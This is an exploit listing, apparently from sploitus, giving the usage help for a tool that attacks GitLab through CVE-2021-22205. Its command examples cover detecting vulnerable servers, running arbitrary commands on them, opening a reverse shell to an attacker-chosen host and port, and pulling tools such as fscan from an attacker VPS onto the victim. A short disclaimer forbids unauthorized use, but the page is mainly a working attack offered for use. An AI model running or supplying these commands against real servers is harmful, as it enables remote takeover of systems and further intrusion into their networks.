Exploit for Code Injection in Gitlab CVE-2021-22205

## https://sploitus.com/exploit?id=8F450D89-6392-5E24-8649-ACA9D4C0D054
# CVE-2021-22205
CVE-2021-22205 RCE 工具仅用于分享交流，切勿用于非授权测试，否则与作者无关
```
  -R string
        VPS to load tools eg: -R 127.0.0.1:8083
  -T string
        Tool name eg: -T fscan
  -c string
        exec cmd eg: -c "id" (default "id")
  -host string
        reverse shell host
  -m string
        Method for using of CVE-2021-22205 eg:-m detect|rce1|rev|upload (default "detect")
  -port string
        reverse shell port
  -target string
        Target Url (eg: -target https://10.10.10.10) (default "https://10.10.10.10")
```


实现四个功能

```
DnsLog探测
-m detect
CVE-2021-22205.exe -target https://10.10.10.10 -m detect

RCE
-m rce1 
rce(Postbin-OOB)
CVE-2021-22205.exe -target https://10.10.10.10 -m rce1 -c whoami

反弹shell
-m rev 
CVE-2021-22205.exe -target https://10.10.10.10 -m rev -host 10.10.10.10 -p 8081

上传文件(http出网-curl,需要VPS)
-m upload 
CVE-2021-22205.exe -target https://10.10.10.10 -m upload  -R 127.0.0.1:8083 -T fscan.exe

```